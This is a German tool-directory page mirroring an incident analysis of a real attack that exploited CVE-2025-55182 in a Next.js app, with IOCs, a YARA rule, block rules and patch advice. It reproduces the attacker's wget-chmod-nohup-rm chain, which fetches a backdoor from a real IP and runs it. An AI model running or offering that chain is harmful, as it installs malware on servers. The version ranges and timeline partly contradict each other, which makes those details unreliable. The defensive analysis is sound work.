Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Management von Indicators of Compromise (IOC)SchwachstellenanalyseForensikWebsicherheitMalware-AnalyseBedrohungsanalyseLernen & BildungIncident Response

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Analyse von Angriffen aus der Praxis von CVE-2025-55182 (React2Shell) - React Server Components RCE-Sicherheitslücke

Repository anzeigen
6vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-55182 Angriffsanalyse: RCE in React Server Components

Reale Angriffsanalyse auf eine produktionseinsatzfähige Next.js-Anwendung

📋 Inhaltsverzeichnis

  • Zusammenfassung
  • Schwachstellenübersicht
  • Angriffszeitstrahl
  • Technische Analyse
  • Malware-Analyse
  • Indikatoren für eine Kompromittierung (IOCs)
  • Abhilfe und Reaktion
  • Erkenntnisse
  • Referenzen

Zusammenfassung

Am 5. Dezember 2025 wurde unsere produktionseinsatzfähige Next.js-Anwendung von Angreifern angegriffen, die CVE-2025-55182 (React2Shell) ausnutzten – eine kritische Remote-Codeausführungsschwachstelle in React Server Components. Der Angriff versuchte, einen Linux-Backdoor-Trojaner auf unserem Server herunterzuladen und auszuführen.

AttributWert
CVE-IDCVE-2025-55182
CVSS-Score9.8 (Kritisch)
Angriffsdatum5. Dezember 2025
Angriffsergebnis✅ Blockiert (nach Patch)
Malware-TypLinux-Backdoor-Trojaner
Betroffener StackNext.js + React Server Components

Schwachstellenübersicht

Was ist CVE-2025-55182?

CVE-2025-55182, auch bekannt als „React2Shell“, ist eine kritische Remote-Codeausführungsschwachstelle (RCE), die React Server Components (RSC) in folgenden Umgebungen betrifft:

  • React: Versionen 19.0.0 - 19.2.1
  • Next.js: Versionen 15.x und 16.x (vor den Patches)

Ursache

Die Schwachstelle liegt in der Funktion renderToReadableStream() im React Flight Server. Bei der Verarbeitung speziell gestalteter RSC-Payloads wird die Eingabe nicht ordnungsgemäß bereinigt, was zur Ausführung beliebigen Codes führt.

Angriffsvektor

root@kitploit:~
Angreifer → Böswilliges RSC-Payload → Flight Server → eval() → RCE

Der Angreifer sendet eine präparierte POST-Anfrage mit einem bösartigen serialisierten Payload, das deserialisiert und auf dem Server ausgeführt wird.


Angriffszeitstrahl

Phase 1: Erste Ausnutzungsversuche (vor Patch)

Zeitstempel (UTC)Ereignis
Dez 5, 06:20Erster Angriff via Sentry erkannt
Dez 5, 06:20Payload versucht, Shell-Befehle auszuführen
Dez 5, 06:20Angriff teilweise erfolgreich (vor Patch)

Sentry-Fehlerprotokoll (vor Patch):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Phase 2: Patch-Bereitstellung

ZeitstempelAktion
Dez 4, 14:13Upgrade auf Next.js 16.0.7
Dez 4, 14:13Gepatchte Version bereitgestellt (v1.0.0-beta-4)

Phase 3: Angriff nach Patch blockiert

Zeitstempel (UTC)Ereignis
Dez 5, 08:48Angriffsversuch erkannt
Dez 5, 08:48Payload-Ausführung BLOCKIERT
Dez 5, 08:48Fehler: syntax error: unexpected ";"

Sentry-Fehlerprotokoll (nach Patch):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

Der Patch hat die Ausführung des bösartigen Befehls erfolgreich verhindert.


Technische Analyse

Details zur Angriffsanfrage

AttributWert
Ziel-URLhttps://[REDACTED]/

Payload-Analyse

Der Angreifer versuchte, die folgende Befehlskette auszuführen:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Aufschlüsselung:

Serverumgebung

KomponenteVersion
BetriebssystemAlpine Linux 3.23.0
LaufzeitNode.js v20.19.6
FrameworkNext.js 16.0.7 (gepatcht)

Malware-Analyse

Dateiinformationen

VirusTotal-Ergebnisse

Erkennungsrate: 13/72 (18%)

VirusTotal-Link: Analyse anzeigen

Binäranalyse

ELF-Header:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Identifizierte Fähigkeiten:

Extrahierte Zeichenketten (relevant):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Ausgelöste IDS-Regeln

SchweregradRegelQuelle
NIEDRIGET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
NIEDRIGET DNS Query for .cc TLDProofpoint ET Open

Malware-Klassifizierung

Typ: Linux-Backdoor-Trojaner

Fähigkeiten:

  • Remote-Shell-Zugriff
  • Command & Control (C2)-Kommunikation
  • Datei-Upload/-Download
  • Verschlüsselte Kommunikation
  • Verkehrstunneling über SOCKS5
  • Persistenzmechanismen

Indikatoren für eine Kompromittierung (IOCs)

Netzwerk-IOCs

Datei-IOCs

Verhaltens-IOCs

YARA-Regel

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Erkennt Backdoor, die über CVE-2025-55182 verbreitet wird"
        author = "Sicherheitsforscher"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

Abhilfe und Reaktion

Sofort ergriffene Maßnahmen

Missbrauchsmeldung

Eine Missbrauchsmeldung wurde an Vultr (den Hosting-Anbieter des C2-Servers) am 5. Dezember 2025 gesendet mit folgenden Angaben:

  • Bösartige IP-Adresse und URL
  • SHA256-Hash der Malware
  • VirusTotal-Analyse-Link
  • Beschreibung des Angriffsvektors (CVE-2025-55182)

Gepatchte Versionen

PaketVerwundbarGepatcht
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1 (Juni 2025+)

Empfohlene Abhilfemaßnahmen

1. Sofort upgraden:

root@kitploit:~
# Für Next.js 16.x
npm install [email protected] [email protected] [email protected]

# Für Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. Bösartige IP blockieren:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. Auf IOCs überwachen:

root@kitploit:~
# Nach verdächtigen Dateien suchen
find /tmp -type f -executable 2>/dev/null

# Nach verdächtigen Prozessen suchen
ps aux | grep -E "(vim|/tmp/)"

# Netzwerkverbindungen prüfen
netstat -an | grep "45.76.155.14"

4. Alle Geheimnisse rotieren:

  • Datenbank-Anmeldeinformationen
  • JWT-Geheimnisse
  • API-Schlüssel
  • Sitzungsgeheimnisse

Erkenntnisse

Was gut lief

  1. Sentry-Überwachung hat den Angriff sofort erkannt
  2. Schnelle Patch-Bereitstellung innerhalb weniger Stunden nach CVE-Veröffentlichung
  3. Docker-Containerisierung begrenzte die Auswirkungsreichweite
  4. Schutz nach Patch blockierte erfolgreich nachfolgende Angriffe

Was verbessert werden könnte

  1. Schnelleres Patchen – Zeit zwischen CVE-Veröffentlichung und Patch verkürzen
  2. WAF-Regeln – Regeln zur Erkennung von RSC-Ausnutzungsversuchen hinzufügen
  3. Ausgehende Filterung – Ausgehende Verbindungen zu unbekannten IPs blockieren
  4. Automatisierte Warnungen – Warnungen bei verdächtigen Shell-Befehlen einrichten

Sicherheitsempfehlungen


Referenzen

Offizielle Advisories

  • Next.js Security Advisory
  • React Security Updates
  • CVE-2025-55182 Details

Analyse-Ressourcen

  • VirusTotal-Analyse
  • MalwareBazaar

Verwendete Tools

  • Sentry – Fehlerüberwachung
  • VirusTotal – Malware-Analyse
  • Docker – Containerisierung

Haftungsausschluss

Dieser Beitrag wird nur zu Bildungs- und Verteidigungszwecken veröffentlicht. Die Malware-Binärdatei ist nicht in diesem Repository enthalten. Sicherheitsforscher können die Probe über VirusTotal mit dem bereitgestellten SHA256-Hash erhalten.


Autor

Veröffentlicht: 5. Dezember 2025

Kontakt: [Ihre Kontaktinformationen oder GitHub-Profil]


Lizenz

Diese Analyse wird unter CC BY 4.0 veröffentlicht. Sie dürfen dieses Material teilen und anpassen, sofern Sie angemessen nennen.


Änderungsprotokoll

DatumVersionÄnderungen
2025-12-051.0Erstveröffentlichung
Tool herunterladen
MethodePOST
User-AgentPython Requests 2.31
UrsprungAutomatisiertes Angriffsskript
SchrittBefehlZweck
1wget http://45.76.155.14/vim -O /tmp/vimMalware herunterladen
2chmod +x /tmp/vimAusführbar machen
3nohup /tmp/vim > /dev/null 2>&1 &Im Hintergrund ausführen, nach Abmeldung weiterlaufen
4rm -f /tmp/vimBeweise löschen
ContainerDocker
AttributWert
Dateinamevim (als legitimes Tool getarnt)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
DateitypELF 64-bit LSB executable, x86-64
SpracheGo (kompilierte Binärdatei)
Dateigröße~4,7 MB
AnbieterErkennungsname
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
FähigkeitNachweis
HTTP/HTTPS-Clientnet/http, *http.Client
TLS-Verschlüsselungcrypto/tls, crypto/aes
SOCKS5-Proxysocks, socks5
DNS-Auflösungnet/dns/dnsmessage
Starke Kryptographiechacha20poly1305, Ed25519
TypWertBeschreibung
IP-Adresse45.76.155.14Malware-Verteilungsserver
URLhttp://45.76.155.14/vimMalware-Download-URL
HostingVultr VPSCloud-Anbieter
TLD.ccC2-Domain verwendet .cc TLD
TypWert
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Bei Bedarf berechnen]
MD5[Bei Bedarf berechnen]
Dateinamevim (getarnt)
DateitypELF 64-bit x86-64
Dateigröße~4,7 MB
IndikatorBeschreibung
wget auf externe IPDownloads von nicht standardmäßigen URLs
Dateien in /tmp/Verdächtige ausführbare Datei im temporären Verzeichnis
nohup + HintergrundausführungPersistenzversuch
Sofortige DateilöschungBeweisbereinigung
Python Requests User-AgentAutomatisiertes Angriffswerkzeug
MaßnahmeStatusDetails
✅ Next.js-UpgradeAbgeschlossen16.0.4 → 16.0.7
✅ React-UpgradeAbgeschlossen19.1.0 → 19.2.1 (gepatcht)
✅ Anwendung neu bereitgestelltAbgeschlossenDocker-Rebuild
✅ Malware analysiertAbgeschlossenVirusTotal-Einreichung
✅ Meldung an HostingAbgeschlossenVultr-Missbrauchsmeldung gesendet
⏳ Anmeldeinformationen rotierenAusstehendDatenbank, JWT, API-Schlüssel
KategorieEmpfehlung
ÜberwachungEchtzeit-Fehlerüberwachung implementieren (Sentry, etc.)
UpdatesSicherheitsadvisories für alle Abhängigkeiten abonnieren
NetzwerkAusgehende Filterung implementieren, unnötige ausgehende Verbindungen blockieren
ContainerAls Nicht-Root ausführen, schreibgeschützte Dateisysteme verwenden
GeheimnisseAnmeldeinformationen regelmäßig rotieren, Secrets Manager verwenden